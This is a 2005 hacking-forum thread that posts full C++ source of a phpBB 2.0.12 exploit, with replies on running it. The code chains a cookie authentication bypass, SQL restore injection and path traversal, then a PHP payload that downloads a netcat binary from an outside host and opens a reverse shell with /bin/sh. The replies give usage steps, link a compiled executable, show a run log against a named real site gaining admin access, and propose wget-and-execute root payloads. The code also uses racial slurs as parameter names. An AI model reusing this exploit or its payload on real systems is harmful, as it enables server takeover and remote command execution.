phpBB User id Auth. Bypass and "admin_styles" Code |
Posted: Wed Mar 16, 2005 6:53 am |
LINUX |
/*
coded by overdose phpbb <= 2.0.12
slythers@gmail.com
C:\source\phpbbexp>bcc32 -c serv.cpp
Borland C++ 5.5.1 for Win32 Copyright (c) 1993, 2000 Borland
serv.cpp:
Warning W8060 serv.cpp 77: Possibly incorrect assignment in function serveur::connectsocket(char *,unsigned short)
C:\source\phpbbexp>bcc32 phpbbexp.cpp serv.obj
Borland C++ 5.5.1 for Win32 Copyright (c) 1993, 2000 Borland
phpbbexp.cpp:
Turbo Incremental Link 5.00 Copyright (c) 1997, 2000 Borland
C:\source\phpbbexp>
je cherche un job au passage :>
*/
#include <iostream.h>
#include <winsock.h>
#include "serv.h"
// PHP handed to the server in the "nigga" request parameter (see main()):
// fetches a file over HTTP, stores it as /tmp/.sess_, makes it executable and
// runs it with the "niggaip"/"niggaport" request values as arguments. "%20"
// is a URL-encoded space. (Long literals in this listing are line-wrapped by
// the page; each one is a single string.)
#define SHELL "$a=fopen(\"http://img58.exs.cx/img58/1584/nc4hk.swf\",\"r\");
$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);
$a=fopen(\"/tmp/.sess_\",\"w\");fwrite($a,$b);fclose($a);
chmod(\"/tmp/.sess_\",0777);system(\"/tmp/.sess_%20\".$_REQUEST[niggaip]
.\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\");"
// Port used by parseurl() when the URL names none.
#define HTTP_PORT 80
// Cookie name prefix assumed when the first reply does not reveal one.
#define DEFAULT_COOKIE "phpbb2mysql"
// Response-header prefix main() scans for.
#define SIGNATURE_SESSID "Set-Cookie: "
// multipart/form-data boundary plus the fixed parts of the "restore" upload
// body: fields restore_start, perform=restore and backup_file (text/sql).
#define BOUNDARY "----------g7pEbdXsWGPB7wRFGrqA1g"
#define UP_FILE "------------g7pEbdXsWGPB7wRFGrqA1g\nContent-Disposition:
form-data; name=\"restore_start\"\n\npetass\n------------g7pEbdXsWGPB7wRFGrqA1g\
nContent-Disposition: form-data; name=\"perform\"\n\nrestore\n------------g7pEbd
XsWGPB7wRFGrqA1g\nContent-Disposition: form-data; name=\"backup_file\";
filename=\"phpbb_db_backup.sql\"\nContent-Type: text/sql\n\n"
#define UP_FILE_END "\n------------g7pEbdXsWGPB7wRFGrqA1g--\n"
// Form body prefix of the admin_styles.php export request.
#define EXP_TEMPLATES "mode=export&edit=Envoyer&export_template="
// Start and end markers of the backup line that reveals the table prefix:
// "DROP TABLE IF EXISTS <prefix>_config;".
#define SIGNATURE_TABLE_NAME "DROP TABLE IF EXISTS "
#define SIGNATURE_TABLE_NAME_END "_config;"
// Opening fragments of the SQL carried in the uploaded backup_file.
#define SQL_TEMPLATES "DROP TABLE IF EXISTS "
#define SQL_TEMPLATES_2 "_themes;\nCREATE TABLE "
// Column definitions of phpBB 2's <prefix>_themes table, used by the uploaded
// backup to recreate it. Adjacent literals concatenate into one string; kept
// as a variable rather than a macro because of its length.
char *sql_templates_3 ="_themes("
"themes_id mediumint(8) unsigned NOT NULL auto_increment,"
"template_name varchar(150) NOT NULL,"
"style_name varchar(30) NOT NULL,"
"head_stylesheet varchar(100),"
"body_background varchar(100),"
"body_bgcolor varchar(6),"
"body_text varchar(6),"
"body_link varchar(6),"
"body_vlink varchar(6),"
"body_alink varchar(6),"
"body_hlink varchar(6),"
"tr_color1 varchar(6),"
"tr_color2 varchar(6),"
"tr_color3 varchar(6),"
"tr_class1 varchar(25),"
"tr_class2 varchar(25),"
"tr_class3 varchar(25),"
"th_color1 varchar(6),"
"th_color2 varchar(6),"
"th_color3 varchar(6),"
"th_class1 varchar(25),"
"th_class2 varchar(25),"
"th_class3 varchar(25),"
"td_color1 varchar(6),"
"td_color2 varchar(6),"
"td_color3 varchar(6),"
"td_class1 varchar(25),"
"td_class2 varchar(25),"
"td_class3 varchar(25),"
"fontface1 varchar(50),"
"fontface2 varchar(50),"
"fontface3 varchar(50),"
"fontsize1 tinyint(4),"
"fontsize2 tinyint(4),"
"fontsize3 tinyint(4),"
"fontcolor1 varchar(6),"
"fontcolor2 varchar(6),"
"fontcolor3 varchar(6),"
"span_class1 varchar(25),"
"span_class2 varchar(25),"
"span_class3 varchar(25),"
"img_size_poll smallint(5) unsigned,"
"img_size_privmsg smallint(5) unsigned,"
"PRIMARY KEY (themes_id)"
");";
// INSERT fragments for the recreated <prefix>_themes table: column list, then
// the VALUES opening of the injected row (themes_id 2).
#define SQL_FAKE_TEMPLATES "\nINSERT INTO "
#define SQL_FAKE_TEMPLATES_2 "_themes (themes_id, template_name, style_name,
head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink,
body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2,
tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3,
td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1,
fontface2, fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2,
fontcolor3, span_class1, span_class2, span_class3, img_size_poll, img_size_privmsg)
VALUES(\'2\', \'"
//template_name varchar(30) NOT NULL,
// template_name value of the injected row; main() also re-sends it, with
// spaces replaced by '+', as the export_template form value.
#define FAKE_TEMPLATES_NAMES "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();
// /../../../../../../../../../../../../../../../../../../../tmp"
// Remaining column values of the injected row.
#define SQL_FAKE_TEMPLATES_3 "\', \'FI Black\', \'fiblack.css\', \'\', \'\', \'\',
\'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\',
\'\', \'\', \'\', \'\', \'\', \'row1\', \'row2\', \'\', \'\', \'\', \'\', \'0\',
\'0\', \'0\', \'\', \'006699\', \'ffa34f\', \'cc\', \'bb\', \'a\', \'0\', \'0\');"
// A plain subSilver row (themes_id 1) inserted alongside the injected one.
#define SQL_FAKE_TEMPLATES_4 "_themes (themes_id, template_name, style_name,
head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink,
body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2,
tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3,
td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1, fontface2,
fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2, fontcolor3,
span_class1, span_class2, span_class3, img_size_poll, img_size_privmsg) VALUES
(\'1\', \'subSilver\', \'subSilver\', \'subSilver.css\',\'\', \'E5E5E5\', \'000000\',
\'006699\', \'5493B4\', \'\', \'DD6900\', \'EFEFEF\', \'DEE3E7\', \'D1D7DC\', \'\',
\'\', \'\', \'98AAB1\', \'006699\', \'FFFFFF\', \'cellpic1.gif\', \'cellpic3.gif\',
\'cellpic2.jpg\', \'FAFAFA\', \'FFFFFF\', \'\', \'row1\', \'row2\', \'\', \'Verdana,
Arial, Helvetica, sans-serif\', \'Trebuchet MS\', \'Courier, \\\'Courier New\\\',
sans-serif\', \'10\', \'11\', \'12\', \'444444\', \'006600\', \'FFA34F\', \'\',
\'\', \'\', NULL, NULL);"
// UPDATE <prefix>_config SET config_value="1" WHERE config_name="default_style".
#define SQL_FAKE_TEMPLATES_5 "\nUPDATE "
#define SQL_FAKE_TEMPLATES_6 "_config set config_value=\"1\" where config_name=\"default_style\";"
// Pieces of the command-line URL as split by parseurl(). dns and uri are
// new[]'d strings owned by the caller; both stay null when the input is
// rejected (no "://").
struct url{
char *dns;
char *uri;
unsigned short port;
};
// Splits "scheme://host[:port][/path]"; see the definition below main().
struct url parseurl(char *of);
// Decimal text of a non-negative int in a new[]'d buffer; null for negatives.
char * intostr(int erf);
// Prints usage and terminates the process.
void help();
// Entry point. argv[1] is the forum base URL (split by parseurl()), argv[2]
// and argv[3] are the ip and port values forwarded to the PHP payload (see
// help()). Six HTTP exchanges follow in order; a failure at any step returns
// 0 just like success, so the exit status carries no information. `serveur`
// comes from serv.h, which is not part of this listing: its operator<< appears
// to send text and getline()/getnb() to read the reply -- confirm against serv.h.
int main(int argc,char *argv[])
{
char buff[1024];   // one response line at a time
char sid[33];      // 32-character session id plus terminator
char oct;          // sink used to drain replies one byte at a time
char *cookiename;
char *ptr;
char *tablename = 0x00;   // table prefix recovered from the SQL backup
char *phpcode = SHELL;
bool flag;
unsigned int longbeach;   // length of the current line
serveur http;
struct url victim;
WSAData wsadata;
// Winsock set-up: the only path that returns a non-zero status.
if(WSAStartup(MAKEWORD(2, 0),&wsadata) != 0)
return 1;
// help() calls exit(), so nothing below runs with fewer than three arguments.
if(argc < 4)
help();
cookiename= DEFAULT_COOKIE;
sid[0] = '\0';
// NOTE(review): victim.dns and victim.uri stay null when parseurl() finds no
// "://" in argv[1]; neither is checked before being used below.
victim = parseurl(argv[1]);
// Step 1: fetch the forum index and read the cookie name prefix (the part
// before "_sid") out of a Set-Cookie header; DEFAULT_COOKIE stays otherwise.
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
http << "GET ";
http << victim.uri;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n
Connection: close\n\n";
// Read header lines until an empty line, a failed getline() (buff is emptied)
// or the cookie line has been handled (buff cleared explicitly).
do{
if(!http.getline(buff,1023))
buff[0] = 0x00;
if(!strncmp(buff,SIGNATURE_SESSID,sizeof(SIGNATURE_SESSID)-1))
{
ptr = buff + sizeof(SIGNATURE_SESSID)-1;
// Terminate at the first '=' and look back four characters for "_sid".
for(ptr; *ptr && (*ptr != '=');ptr++);
*ptr= '\0';
ptr -= 4;
if(!strncmp(ptr,"_sid",4))
{
*ptr = '\0';
ptr = buff + sizeof(SIGNATURE_SESSID)-1;
// Heap copy of the prefix; never delete[]'d in this function.
cookiename = new char[strlen(ptr)+1];
strcpy(cookiename,ptr);
cout << "_ nom du cookie recuperer : "<<cookiename<<endl;
buff[0] = '\0';
};
};
}while(buff[0]);
http.closesock();
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
// Step 2: repeat the request with a crafted "<cookiename>_data" cookie (a
// URL-encoded serialized PHP array: autologinid => true, userid => "2") and
// record the "<cookiename>_sid" value the server answers with. This is the
// cookie / user-id authentication bypass.
http << "GET ";
http << victim.uri;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nCookie: ";
http << cookiename;
http << "_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\n\n";
// Same header scan as step 1, ending on an empty line or a failed read; the
// sid is copied with a 32-byte bound and terminated explicitly.
do{
if(!http.getline(buff,1023))
buff[0] = 0x00;
if(!strncmp(buff,SIGNATURE_SESSID,sizeof(SIGNATURE_SESSID)-1))
{
ptr = buff + sizeof(SIGNATURE_SESSID)-1;
if((!strncmp(ptr,cookiename,strlen(cookiename))) && (!strncmp(&ptr[strlen(cookiename)],"_sid=",sizeof("_sid=")-1)))
{
ptr += strlen(cookiename) + sizeof("_sid=")-1;
strncpy(sid,ptr,32);
sid[32] = '\0';
};
};
}while(buff[0]);
// No session id means the bypass did not take; nothing further is attempted.
if(!sid[0])
{
cout << "_ recuperation de l'identifiant de session a echouer"<<endl;
return 0;
};
cout << "_ SESSION ID recuper? ... "<<sid<<endl<<argv[1]<<"?sid="<<sid<<endl;
http.closesock();
// Step 3: with that session, request a structure-only SQL backup from
// admin_db_utilities.php and scan it for the first
// "DROP TABLE IF EXISTS <prefix>_config;" line to learn the table prefix.
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
cout <<"_ recuperation du nom de la table sql ... ";
http << "GET ";
http << victim.uri;
http << "admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=
structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid=";
http << sid;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\n\n";
// Loop ends on the first matching line or when getline() fails.
flag = 1;
while(flag)
{
flag = http.getline(buff,1023);
if(!strncmp(buff,SIGNATURE_TABLE_NAME,sizeof(SIGNATURE_TABLE_NAME)-1))
{
longbeach = strlen(buff);
// Compare the tail of the line with "_config;" before cutting it off.
ptr = buff + longbeach - (sizeof(SIGNATURE_TABLE_NAME_END)-1);
if(!strcmp(ptr,SIGNATURE_TABLE_NAME_END))
{
flag = 0;
*ptr= '\0';
ptr = buff + sizeof(SIGNATURE_TABLE_NAME) -1;
// Heap copy of the prefix; never delete[]'d.
tablename = new char[strlen(ptr)+1];
strcpy(tablename,ptr);
};
};
};
http.closesock();
if(!tablename)
{
cout <<"can\'t find"<<endl;
return 0;
};
cout <<tablename << " OK"<<endl;
cout << "_ Injection de la fake templates ...";
// Step 4: POST a multipart/form-data "restore" to admin_db_utilities.php. The
// backup_file part is SQL that drops and recreates <prefix>_themes with two
// rows -- the injected one carries FAKE_TEMPLATES_NAMES as template_name --
// and sets default_style to 1 in <prefix>_config. The Content-Length text
// comes from intostr(), whose buffer is never delete[]'d.
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
http << "POST ";
http << victim.uri;
http << "admin/admin_db_utilities.php?sid=";
http << sid;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close, TE\r\nTE:
deflate, chunked, identify, trailers\r\nCache-Control: no-cache\r\nContent-Type: multipart/form-data;
boundary=" BOUNDARY "\nContent-Length: ";
http << intostr(strlen(sql_templates_3)+sizeof(SQL_TEMPLATES)-1+sizeof(SQL_TEMPLATES_2)-1+sizeof
(SQL_FAKE_TEMPLATES)-1+strlen(tablename)+sizeof(SQL_FAKE_TEMPLATES_2)-1+sizeof
(FAKE_TEMPLATES_NAMES)-1+sizeof(SQL_FAKE_TEMPLATES_3)-1+sizeof(SQL_FAKE_TEMPLATES)-1+
strlen(tablename)+sizeof(SQL_FAKE_TEMPLATES_4)-1+sizeof(SQL_FAKE_TEMPLATES_5)-1+
strlen(tablename)+sizeof(SQL_FAKE_TEMPLATES_6)-1+sizeof(UP_FILE_END)-1+sizeof(UP_FILE));
http << "\n\n" UP_FILE SQL_TEMPLATES;
http << tablename;
http << SQL_TEMPLATES_2;
http << tablename;
http << sql_templates_3;
http << SQL_FAKE_TEMPLATES;
http << tablename;
http << SQL_FAKE_TEMPLATES_4 SQL_FAKE_TEMPLATES_5;
http << tablename;
http << SQL_FAKE_TEMPLATES_6 SQL_FAKE_TEMPLATES;
http << tablename;
http << SQL_FAKE_TEMPLATES_2 FAKE_TEMPLATES_NAMES SQL_FAKE_TEMPLATES_3 UP_FILE_END ;
// Drain the reply without inspecting it.
while(http.getnb(&oct,sizeof(char)));
cout <<"OK"<<endl;
// Copy of FAKE_TEMPLATES_NAMES with spaces turned into '+', used as the form
// value of the next request; this is the buffer delete[]'d at the end.
ptr = new char[sizeof(FAKE_TEMPLATES_NAMES)];
strcpy(ptr,FAKE_TEMPLATES_NAMES);
for(int cpt = 0; ptr[cpt]!= '\0';cpt++)
{
if(ptr[cpt] == ' ')
ptr[cpt] = '+';
};
// Step 5: POST to admin_styles.php?mode=export with export_template set to
// that '+'-encoded name; the reply is discarded.
http.closesock();
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
http << "POST ";
http << victim.uri;
http << "admin/admin_styles.php?mode=export&sid=";
http << sid;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "admin/admin_styles.php?mode=export\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: ";
http << intostr(strlen(ptr)+sizeof(EXP_TEMPLATES)-1);
http << "\n\n";
http << EXP_TEMPLATES;
http << ptr;
while(http.getnb(&oct,sizeof(char)));
cout << "_ Fichier cr?e"<<endl;
// Step 6: GET admin_styles.php?mode=addnew with install_to pointing at /tmp
// through a "../" chain, argv[2]/argv[3] as niggaip/niggaport and SHELL as
// nigga; the reply is discarded and a URL for the same endpoint is printed.
http.closesock();
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
http << "GET ";
http << victim.uri;
http << "admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=";
http << sid;
http << "&niggaip=";
http << argv[2];
http << "&niggaport=";
http << argv[3];
http << "&nigga=";
http << phpcode;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\n\n";
while(http.getnb(&oct,sizeof(char)));
cout << "_ Code execut?"<<endl<<argv[1]<<"admin/admin_styles.php?mode=addnew&install_to
=../../../../../../../../../../../../../../../../../../../tmp&nigga=phpinfo();&sid="<<sid<<endl;
delete[] ptr;
return 0;
}
// Splits "scheme://host[:port][/path]" into its parts.
// - dns: new[]'d copy of the host (up to '/', ':' or end of string).
// - port: the digits after ':' via atoi(), HTTP_PORT when absent or empty.
// - uri: new[]'d copy of the rest, or "/" when nothing follows the host.
// dns and uri stay null when no "://" is found. The input is written to
// temporarily (to terminate the port digits) and restored before returning.
struct url parseurl(char *of)
{
    struct url result = { 0, 0, HTTP_PORT };

    // Skip the scheme: everything up to the first ':'.
    char *p = of;
    while (*p != '\0' && *p != ':')
        p++;

    // At least "://" plus one more character must follow.
    if (*p == '\0' || p[1] == '\0' || p[2] == '\0')
        return result;
    if (p[1] != '/' || p[2] != '/')
        return result;
    p += 3;

    // Host part.
    unsigned int len = 0;
    while (p[len] != '\0' && p[len] != '/' && p[len] != ':')
        len++;
    result.dns = new char[len + 1];
    memcpy(result.dns, p, len);
    result.dns[len] = '\0';
    p += len;

    // Optional ":port": terminate the digits in place for atoi(), then put
    // the overwritten character back.
    if (*p == ':') {
        p++;
        len = 0;
        while (p[len] != '\0' && p[len] != '/')
            len++;
        char saved = p[len];
        p[len] = '\0';
        if (len != 0)
            result.port = atoi(p);
        p[len] = saved;
        p += len;
    }

    // Path part, defaulting to "/".
    const char *path = (*p != '\0') ? p : "/";
    result.uri = new char[strlen(path) + 1];
    strcpy(result.uri, path);
    return result;
}
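// Renders a non-negative int as decimal text in a new[]'d buffer that the
// caller must delete[]. Returns a null pointer for negative input.
// Digits are counted by repeated division instead of growing a power of ten,
// so inputs at or above 1,000,000,000 no longer overflow the counter
// (the old 1,10,100,... multiplier reached 10^10, undefined for int).
char * intostr(int erf)
{
    if (erf < 0)
        return 0;

    // Number of decimal digits; zero still takes one.
    int digits = 0;
    for (int rest = erf; rest != 0; rest /= 10)
        digits++;
    if (digits == 0)
        digits = 1;

    // Fill from the least significant digit backwards.
    char *out = new char[digits + 1];
    out[digits] = '\0';
    for (int pos = digits - 1; pos >= 0; pos--) {
        out[pos] = static_cast<char>('0' + erf % 10);
        erf /= 10;
    }
    return out;
}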
// Prints the usage text and terminates the process; a caller never resumes
// after help().
void help()
{
    cout << "phpbbexp.exe http://site.com/phpbb/ [backshell ip] [backshell port]" << endl
         << "coded by Malloc(0) Wicked Attitude" << endl
         << "phpbb <= 2.0.12 uid vuln + admin_styles.php exploit" << endl;
    exit(0);
}
compiled exploit > http://overdose.tcpteam.org/phpbbexp.exe = http://overdose.tcpteam.org/phpbbexp.rar |
Posted: Wed Mar 16, 2005 12:29 pm |
KingOfSka |
sounds beautiful
but it doesn't work on my test forum...
has someone tried it? |
Posted: Wed Mar 16, 2005 1:25 pm |
LINUX |
KingOfSka wrote: | sounds beautiful
but it doesn't work on my test forum...
has someone tried it? |
yes work nice, use netcat for listen in one port and run xpl
first one cmd : netcat listen port 6666
second : exploit htttp://www.victim.com/phpbb youip youport
copy and paste link in the cmd and go to you browser direct admin or copy and paste very large link and change phpinfo() for system(id)
english ..... xD |
Posted: Wed Mar 16, 2005 2:53 pm |
KingOfSka |
i already tried it...
could it be that this exploit works only on some servers?
*edit: if someone wants to try, http://skarulez.altervista.org/phpbb2.0.10/ , it's a test forum i put up, as you can see many people have already tested various exploits |
Posted: Wed Mar 16, 2005 3:05 pm |
O.T.M |
how to use this just compile and run?
but how run (port server ip)
like this exploit.exe 200.1.1.200 100
exploit name ip port
how? |
Posted: Wed Mar 16, 2005 3:42 pm |
KingOfSka |
LINUX wrote: | KingOfSka wrote: | sounds beautiful
but it doesn't work on my test forum...
has someone tried it? |
yes work nice, use netcat for listen in one port and run xpl
first one cmd : netcat listen port 6666
second : exploit htttp://www.victim.com/phpbb youip youport
copy and paste link in the cmd and go to you browser direct admin or copy and paste very large link and change phpinfo() for system(id)
english ..... xD |
he said all |
Posted: Wed Mar 16, 2005 4:10 pm |
LINUX |
ok now i think redevelop this exploit, original exploit only its posible exec one cmd command for example sytem(id) or system(uname) but not is possible exec (uname -a) (wget www.a.a) ect, .
Correct exploit need make a function in php what this not generate space for use an function system() for correct use system(uname -a;wget www.a.a/root;chmod -c 777 root;./root; SH xD
i listen ideas now i develop this
remember my english not is very good |
Posted: Wed Mar 16, 2005 4:53 pm |
zer0-c00l |
someone can put the .exe in ftp?
i can't compile it here |
Posted: Thu Mar 17, 2005 5:09 am |
y3dips |
Posted: Thu Mar 17, 2005 6:17 am |
LINUX |
men all links work nice you need the source code ?
my friends in canada and russia redevelop exploit finish this day and i share dont worry |
Posted: Thu Mar 17, 2005 6:00 pm |
O.T.M |
O.T.M wrote: | how to use this just compile and run?
but how run (port server ip)
like this exploit.exe 200.1.1.200 100
exploit name ip port
how? |
Posted: Thu Mar 17, 2005 7:55 pm |
zer0-c00l |
why netcat?
the xpl returns to me:
C:\Documents and Settings\Windows\Desktop>phpbbexp XXXXXXXX *********** 1337
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuper? ... 85f90d4021c5dbaf24f8cf39d255a6d9
http://www.sbfisica.org.br/phpBB2/?sid=85f90d4021c5dbaf24f8cf39d255a6d9
_ recuperation du nom de la table sql ... phpbb_ OK
_ Injection de la fake templates ...OK
_ Fichier cr?e
_ Code execut?
xxxxxxxxxxxxxxxxxxxx/admin/admin_styles.php?mode=addnew&install_to=
../../../../../../../../../../../../../../../../../../../tmp&nigga=phpinfo();&si
d=85f90d4021c5dbaf24f8cf39d255a6d9
ok, i enter in this URL and i got in admin panel, its ok
but netcat is still in 'listen' :S |
Posted: Sun Mar 20, 2005 4:24 pm |
Injector |
does this exploit mean that you have shell access on the site? |
Posted: Mon Mar 21, 2005 12:58 pm |
shai-tan |
Posted: Tue Mar 22, 2005 1:48 pm |
murdock |
I think the compiled version won't work.
You need to change the URL in this part of the code:
Code: | #define SHELL "$a=fopen(\"http://img58.exs.cx/img58/1584/nc4hk.swf\",\"r\");
$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);
$a=fopen(\"/tmp/.sess_\",\"w\");fwrite($a,$b);fclose($a);
chmod(\"/tmp/.sess_\",0777);system(\"/tmp/.sess_%20\".$_REQUEST[niggaip]
.\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\");"
|
This URL points to a compiled Linux netcat; you need to change it to a valid URL because this one no longer exists!
I changed it but I can't compile it because I don't have the "serv.h" header file; can anyone send me this file? Thanks!
Salud! |
Last edited by murdock on Tue Mar 22, 2005 7:06 pm; edited 1 time in total |